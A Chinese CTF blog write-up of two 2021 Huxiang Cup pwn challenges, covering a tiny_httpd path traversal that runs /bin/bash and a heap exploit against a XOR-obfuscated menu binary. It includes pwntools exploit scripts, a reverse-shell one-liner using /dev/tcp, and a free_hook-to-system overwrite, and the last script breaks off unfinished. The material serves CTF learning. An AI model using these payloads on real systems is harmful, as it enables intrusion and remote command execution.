<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="2021湖湘杯pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="2021湖湘杯线上">
<meta property="og:url" content="http://example.com/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/index.html">
<meta property="og:site_name" content="ABf1ag&#39;s blog">
<meta property="og:description" content="2021湖湘杯pwn">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116215036500.png">
<meta property="og:image" content="http://example.com/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116215345606.png">
<meta property="og:image" content="http://example.com/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116215712832.png">
<meta property="og:image" content="http://example.com/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116220903194.png">
<meta property="og:image" content="http://example.com/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116224122030.png">
<meta property="og:image" content="http://example.com/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116221920622.png">
<meta property="og:image" content="http://example.com/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116222231479.png">
<meta property="og:image" content="http://example.com/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211125211355768.png">
<meta property="og:image" content="http://example.com/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211125213128459.png">
<meta property="article:published_time" content="2021-11-16T13:34:28.000Z">
<meta property="article:modified_time" content="2021-11-25T13:53:14.607Z">
<meta property="article:author" content="ABf1ag">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116215036500.png">

<link rel="canonical" href="http://example.com/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>2021湖湘杯线上 | ABf1ag's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">ABf1ag's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section">Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section">Archives</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section">links</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="ABf1ag">
      <meta itemprop="description" content="CTF to learn,not learn to CTF">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ABf1ag's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          2021湖湘杯线上
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-11-16 21:34:28" itemprop="dateCreated datePublished" datetime="2021-11-16T21:34:28+08:00">2021-11-16</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-11-25 21:53:14" itemprop="dateModified" datetime="2021-11-25T21:53:14+08:00">2021-11-25</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="2021湖湘杯pwn"><a href="#2021湖湘杯pwn" class="headerlink" title="2021湖湘杯pwn"></a>2021湖湘杯pwn</h3><span id="more"></span>

<h3 id="1-tiny-httpd"><a href="#1-tiny-httpd" class="headerlink" title="1.tiny_httpd"></a>1.tiny_httpd</h3><p>这个题直接给出了源码，分析源码可以发现他会将两个连续的’.’变成一个，并且path是我们可以控制的，这就造成了漏洞。</p>
<p><img src="/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116215036500.png" alt="image-20211116215036500"></p>
<p>路径确定后如果cgi=1那么就会执行文件，如果为0就会查看文件。</p>
<p><img src="/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116215345606.png" alt="image-20211116215345606"></p>
<p>一开始的思路就是利用目录穿越直接查看flag，结果发现seeve_file的file路径被写死。</p>
<p><img src="/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116215712832.png" alt="image-20211116215712832"></p>
<p>所以得利用目录穿越执行/bin/bash,要使其可执行，就必须是cgi=1。要使cgi=1有两种方法，第一种是利用POST请求，第二种方法是利用GET请求但需要加？+参数，但由于并不知道参数名，所以我们只能使用POST的传参。</p>
<p><img src="/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116220903194.png" alt="image-20211116220903194"></p>
<p>使用POST的传参是需要注意，一定要在后面添加content-length。</p>
<p>exp：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">io=remote(&#x27;127.0.0.1&#x27;,9990)</span><br><span class="line"></span><br><span class="line">payload=&#x27;POST /.../.../.../.../.../.../.../.../.../bin/bash\r\nContent-length: 100\r\n&#x27;</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<p>但因为程序使用了<code>dup2(cgi_output[1],STDOUT);dup2(cgi_input[0],STDIN);</code>将输入输出重定向了，所以我们并不能得到回显，因此需要我们反弹shell。</p>
<p>我们先监听要反弹shell的端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -vnlp port</span><br></pre></td></tr></table></figure>

<p>在交互下执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1</span><br></pre></td></tr></table></figure>

<p>就可以拿到新的shell了。</p>
<p>关于这个重定向，我找到了写出这个[web服务的作者]( <a target="_blank" rel="noopener" href="https://segmentfault.com/a/1190000019820410">C - C语言实现最简单的HTTP服务器 - SegmentFault 思否</a> ),它里面给出了一张图，很直观。</p>
<p><img src="/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116224122030.png" alt="image-20211116224122030"></p>
<p><strong>小插曲</strong>：在看到这个反弹shell的命令时，我问了问fmyyy👴他的原理是啥，他紧接着发了个命令给我</p>
<p><img src="/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116221920622.png" alt="image-20211116221920622"></p>
<p>然后我就天真的执行了（emmmmmmmmmm）</p>
<p><img src="/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211116222231479.png" alt="image-20211116222231479"></p>
<p>好家伙，直接言传身教，学到了，学到了。</p>
<h3 id="2-双边协议3-0"><a href="#2-双边协议3-0" class="headerlink" title="2.双边协议3.0"></a>2.双边协议3.0</h3><p>还记得双边协议1.0是红名谷杯的题，这个是他的加强版。</p>
<p>这个题在当时做的时候逆了一天才把他的输入给绕过，赛后得wjh师傅和darry师傅帮助终于把这个题完整的复现了出来。</p>
<p>我们先看下这个程序他干了什么。</p>
<ul>
<li><p>将所有的输出先进行一系列异或操作，然后使用base64加密输出</p>
</li>
<li><p>将我们的输入先进行base64解密，解出的前八位是固定字符串’lanlanww‘，第八到第十六位是大小(要求不能大于0x4f),从第16位开始到最后需要对其进行一系列异或解密，解密后的字符被读入。</p>
</li>
<li><p>只能允许我们申请0x110大小的chunk。可以对其编辑和删除</p>
</li>
<li><p>允许输出堆的内容，但会先将要输出的内容进行一系列异或解密，然后对其惊醒一系列异或加密输出。</p>
</li>
<li><p>留有后门函数，可以申请0x2000以上大小的chunk，可以free并且不置0，可以对其进行一次写操作，可以在申请一个0x3918大小的chunk。</p>
</li>
<li><p>编辑删除输出都取决于ptr+0x108是否为0</p>
<p>麻烦的其实就是逆这个异或算法了(对逆向爷来说都是小case)，每轮都会取一个随机数作为密钥key，然后将ptr+0x100内的数据逐个和这个key异或，这个key将会被随机插入到ptr+0x50内的任意一个位置，并且在最后也就是每轮i的位置记录key的位置。直到i=ptr+0xfe</p>
</li>
</ul>
<p><img src="/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211125211355768.png" alt="image-20211125211355768"></p>
<p>正因为i记录了key的位置，因此我们就可以直到每轮key的位置了，因此就可以从后往前将每轮的key值取出，异或回去得到原来的置。解密脚本如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">import base64</span><br><span class="line">a=&#x27;d3duYWxuYWwWAAAAAAAAABZ0TQ8cTkxVIkQhUxdLW20mQA5CWQgtF0xJAVJAXXBheyhCPlxhNGoHMkhyNiByaGxbKn12TUBBLVs9ZEpBWxDQ0HtmFAxOBtDQNyjQ0G4qcNBi0BhAARHQ0NDQ0Dl/0NBjZ9DQRDwJ0NB2fxhZI9DQ0EJEdtDQ0NDQBtAY0NA20A3Q0NBj0NAaLNDQYCzQ0NAM0EjQatDQ0C/Q0BvQ0NDQ0NDQ0G3Q0CkpUCs+SyYrOC5xIGIfTXAIcAV6UndRTxQdBzAWZWx9OmhWISdEelxcMHR+YlRXEXl8VTR4UUFYd2VLHiAkMjQ4AUJsHm8aLio+WFYFaVhtTxM1F05VIgg=&#x27;</span><br><span class="line">print(hex(len(a)))</span><br><span class="line">mingwen=base64.b64decode(a.encode())</span><br><span class="line">mingwen=mingwen[16:]</span><br><span class="line">#print(mingwen)</span><br><span class="line">s=[]</span><br><span class="line">for i in mingwen:</span><br><span class="line">   s.append(i)</span><br><span class="line">print(s)</span><br><span class="line">for i in range(0xff,0x4f,-2):</span><br><span class="line">    key = s[s[i]]</span><br><span class="line">    for j in range(i):</span><br><span class="line">        s[j] ^= key</span><br><span class="line">    #dele key</span><br><span class="line">    for k in range(s[i],i):</span><br><span class="line">        s[k] = s[k+1]</span><br><span class="line">string=&#x27;&#x27;</span><br><span class="line">#s=s[:32]</span><br><span class="line">print(s)</span><br><span class="line">for i in s:</span><br><span class="line">    string+=chr(i)</span><br><span class="line">print(string)</span><br></pre></td></tr></table></figure>

<p>那我们该如何绕过输入呢，我们可以看见每次会从最后将key的位置取出然后和数据异或，因此我们只需要使其取出的值为0即可。因此我们可以这样写：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload=&#x27;a&#x27;*0x10</span><br><span class="line">payload=payload.ljust(0x80,&#x27;\x00&#x27;)</span><br><span class="line">payload=payload.ljust(0x100,&#x27;\x12&#x27;)</span><br></pre></td></tr></table></figure>

<p>本以为可以进行交互这个题就差不多了，但一直泄露不了libc_base，原因是一直被ptr+0x108这里的值给卡住了，最后问了wjh师傅说可以向前溢出，我才发现这里还有一个漏洞。</p>
<p>一开始我以为_BYTE这个类型是不会存在负值的，但调试发现是有负值的，因此就可以向前溢出，因为获得key之后就会将其删除，从后面补上，如果key的位置在chunk前面，那么只需要补一个值就行，因此就可以将1变成0。</p>
<p><img src="/2021/11/16/2021%E6%B9%96%E6%B9%98%E6%9D%AF%E7%BA%BF%E4%B8%8A/image-20211125213128459.png" alt="image-20211125213128459"></p>
<p>因为远程环境是libc2.23，所以0x120大小的chunk会被放入unsortedbin中，因此我们想到打global_max_fast,利用unsrotedbinattack将global_max_fast改为一个很大的值，然后我们可以利用那个后门函数申请0x3918大小的chunk，因为将此chunkfree后正好就是free_hook的位置，然后改此chunk的fd指针为system函数的地址。最后在申请一下0x3918大小的chunk就可以将free_hook的值覆盖为system的地址了。</p>
<p>完整exp如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">import base64</span><br><span class="line">io=process(&#x27;./Maybe_fun_game_3&#x27;)</span><br><span class="line">elf=ELF(&#x27;./Maybe_fun_game_3&#x27;)</span><br><span class="line">libc=elf.libc</span><br><span class="line">#io=remote(&#x27;47.93.163.42&#x27;, 36479)</span><br><span class="line">context.log_level=&#x27;debug&#x27;</span><br><span class="line"></span><br><span class="line">def decode(a):</span><br><span class="line">	mingwen=base64.b64decode(a.encode())</span><br><span class="line">	mingwen=mingwen[16:]</span><br><span class="line">	#print(mingwen)</span><br><span class="line">	s=[]</span><br><span class="line">	for i in mingwen:</span><br><span class="line">	   s.append(ord(i))</span><br><span class="line">	#print((s))</span><br><span class="line">	for i in range(0xff,0x4f,-2):</span><br><span class="line">	    key = s[s[i]]</span><br><span class="line">	    for j in range(i):</span><br><span class="line">		s[j] ^= key</span><br><span class="line">	    #dele key</span><br><span class="line">	    for k in range(s[i],i):</span><br><span class="line">		s[k] = s[k+1]</span><br><span class="line">	string=&#x27;&#x27;</span><br><span class="line">	s=s[:8]</span><br><span class="line">	for i in s:</span><br><span class="line">	    string+=chr(i)</span><br><span class="line">	b=u64(string)</span><br><span class="line">	return b</span><br><span class="line"></span><br><span class="line">def inputs(choice):</span><br><span class="line">	a=&#x27;wwnalnal\x20\x00\x00\x00\x00\x00\x00\x00&#x27;</span><br><span class="line">	b=str(choice)</span><br><span class="line">	b=b.ljust(0x60,&#x27;\x00&#x27;)</span><br><span class="line">	b=b.ljust(0x100,&#x27;\x06&#x27;)</span><br><span class="line">	mingwen=base64.b64encode(a+b)</span><br><span class="line">	print(mingwen)</span><br><span class="line">	return mingwen</span><br><span class="line">	</span><br><span class="line">def add(a1,s):</span><br><span class="line">	choice=inputs(1)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.sendline(choice)</span><br><span class="line">	size=inputs(a1)</span><br><span class="line">	io.sendlineafter(&#x27;=\n&#x27;,size)</span><br><span class="line">	a=&#x27;wwnalnal\x20\x00\x00\x00\x00\x00\x00\x00&#x27;</span><br><span class="line">	content=base64.b64encode(a+s)	</span><br><span class="line">	io.sendlineafter(&#x27;=\n&#x27;,content)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line"></span><br><span class="line">def add2(a1):</span><br><span class="line">	choice=inputs(1)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.sendline(choice)</span><br><span class="line">	size=inputs(a1)</span><br><span class="line">	io.sendlineafter(&#x27;=\n&#x27;,size)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line"></span><br><span class="line">def dele(a1):</span><br><span class="line">	choice=inputs(2)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.sendline(choice)</span><br><span class="line">	index=inputs(a1)</span><br><span class="line">	io.sendlineafter(&#x27;=\n&#x27;,index)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line"></span><br><span class="line">def edit(a1,s):</span><br><span class="line">	choice=inputs(3)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.sendline(choice)</span><br><span class="line">	index=inputs(a1)</span><br><span class="line">	io.sendlineafter(&#x27;=\n&#x27;,index)	</span><br><span class="line">	a=&#x27;wwnalnal\x20\x00\x00\x00\x00\x00\x00\x00&#x27;</span><br><span class="line">	content=base64.b64encode(a+s)	</span><br><span class="line">	io.sendlineafter(&#x27;=\n&#x27;,content)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line"></span><br><span class="line">def show(a1):</span><br><span class="line">	choice=inputs(4)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.sendline(choice)</span><br><span class="line">	index=inputs(a1)</span><br><span class="line">	io.sendlineafter(&#x27;=\n&#x27;,index)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def exp():</span><br><span class="line">	choice=inputs(5)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.sendline(choice)	</span><br><span class="line">	size=inputs(14616)</span><br><span class="line">	io.sendlineafter(&#x27;=\n&#x27;,size)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	payload=&#x27;a&#x27;*0x10</span><br><span class="line">	payload=payload.ljust(0x80,&#x27;\x00&#x27;)</span><br><span class="line">	payload=payload.ljust(0x100,&#x27;\x12&#x27;)</span><br><span class="line">	add(56,payload)#0</span><br><span class="line">	payload1=&#x27;deadbeef&#x27;*0x2</span><br><span class="line">	payload1=payload1.ljust(0x60,&#x27;\x00&#x27;)</span><br><span class="line">	payload1=payload1.ljust(0xff,&#x27;\x12&#x27;)</span><br><span class="line">	payload1+=&#x27;\xe8&#x27;</span><br><span class="line">	add(56,payload1)#1</span><br><span class="line">	add(56,payload1)#2</span><br><span class="line">	dele(0)</span><br><span class="line">	show(1)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	show(0)</span><br><span class="line">	a=io.recvuntil(&#x27;=&#x27;)</span><br><span class="line">	print(&#x27;a&#x27;,a)</span><br><span class="line">	malloc_hook=decode(a)-16-88</span><br><span class="line">	libc_base=malloc_hook-libc.symbols[&#x27;__malloc_hook&#x27;]</span><br><span class="line">	print(&#x27;libc_base&#x27;,hex(libc_base))	</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	onegadget=[0x45226,0x4527a,0xf03a4,0xf1247]</span><br><span class="line">	global_max_fast=libc_base+0x3c67f8</span><br><span class="line">	system=libc_base+libc.symbols[&#x27;system&#x27;]</span><br><span class="line"></span><br><span class="line">	edit(0,p64(malloc_hook+88+16)+p64(global_max_fast-0x10))</span><br><span class="line">	add(56,&#x27;/bin/sh\x00&#x27;)#3</span><br><span class="line">	</span><br><span class="line">	#free(v3)</span><br><span class="line">	choice=inputs(5)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.sendline(choice)</span><br><span class="line">	</span><br><span class="line">	#Content</span><br><span class="line">	choice=inputs(5)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.sendline(choice)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	a=&#x27;wwnalnal\x20\x00\x00\x00\x00\x00\x00\x00&#x27;</span><br><span class="line">	content=base64.b64encode(a+p64(system))</span><br><span class="line">	io.sendline(content)</span><br><span class="line">	gdb.attach(io)</span><br><span class="line">	choice=inputs(5)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	